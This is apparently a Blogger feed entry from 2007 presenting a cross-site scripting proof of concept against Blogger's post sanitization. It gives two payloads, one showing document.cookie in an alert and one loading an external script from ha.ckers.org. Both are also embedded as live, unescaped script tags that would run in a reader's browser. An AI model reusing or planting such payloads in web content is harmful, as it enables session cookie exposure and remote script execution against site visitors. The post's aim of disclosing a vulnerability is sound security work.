tag:blogger.com,1999:blog-5679437269874434422012-01-04T21:53:33.804+01:00P.O.C. A Siculezza.itDaniele Costanoreply@blogger.comBlogger11100tag:blogger.com,1999:blog-567943726987443442.post-54028506837092884212007-08-11T18:42:00.000+02:002007-08-11T18:52:52.816+02:00Blogger XSS : Proof Of ConceptHi this blog was created as a proof of concept to demonstrate that Blogger didn't sanitize the code injected into a post.<br />Just insert the following code to test into any blog created by Blogger...<br /><br /><strong>&lt;script&gt;alert(document.cookie)&lt;/script&gt;<script>alert(document.cookie)</script><br /><br /><br /><br /></strong>ot this code<br /><p><strong><br />&lt;script src="http://ha.ckers.org/xss.js"&gt;&lt;/script&gt;</strong></p><strong><br /><br /></strong>><script src="http://ha.ckers.org/xss.js"></script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/567943726987443442-5402850683709288421?l=pocasiculezza.blogspot.com' alt='' /></div>Daniele Costanoreply@blogger.com1